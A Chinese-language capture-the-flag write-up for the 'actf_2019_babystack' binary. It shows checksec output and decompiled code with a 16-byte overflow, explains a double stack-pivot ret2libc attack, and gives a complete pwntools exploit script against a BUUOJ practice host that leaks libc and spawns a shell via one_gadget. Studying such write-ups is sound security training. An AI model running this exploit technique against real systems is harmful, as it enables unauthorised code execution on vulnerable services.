actf_2019_babystack
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x3ff000)
64位,只开了nx
__int64 __fastcall main(int a1, char **a2, char **a3)
{
char s[208]; // [rsp+0h] [rbp-D0h] BYREF
setbuf(stdin, 0LL);
setbuf(stdout, 0LL);
setbuf(stderr, 0LL);
signal(14, handler);
alarm(0x3Cu);
memset(s, 0, sizeof(s));
puts("Welcome to ACTF's babystack!");
sleep(3u);
puts("How many bytes of your message?");
putchar(62);
sub_400A1A();
if ( nbytes <= 0xE0 )
{
printf("Your message will be saved at %p\n", s);
puts("What is the content of your message?");
putchar(62);
read(0, s, nbytes);
puts("Byebye~");
return 0LL;
}
else
{
puts("I've checked the boundary!");
return 1LL;
}
}
让我们输入size,并且这个size最大,刚好更栈空间相差0x10,明显的栈迁移,
给出了栈地址,我们迁移到栈即可
思路
写ret2libc到栈空间,并且溢出返回栈,第一次返回libc基地址,第二次直接使用onegadget去getshell
也就是使用两次栈迁移
from pwn import*
from Yapack import *
libc=ELF('libc-2.27.so')
r,elf=rec("node4.buuoj.cn",27330,"./pwn",10)
context(os='linux', arch='amd64',log_level='debug')
leave=0x400A18
rdi=0x0000000000400ad3
sla(b'>',str(0xe0))
stack=get_addr_int()
pl=p64(0)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x4008F6)
pl=ljust(pl,0xd0)+flat(stack,leave)
sa(b'>',pl)
leak=get_addr_u64()-libc.sym['puts']
li(leak)
one=[0x4f2c5,0x4f322,0x10a38c]
sla(b'>',str(0xe0))
stack=get_addr_int()
pl=p64(0)+p64(one[0]+leak)
pl=ljust(pl,0xd0)+flat(stack,leave)
sa(b'>',pl)
ia()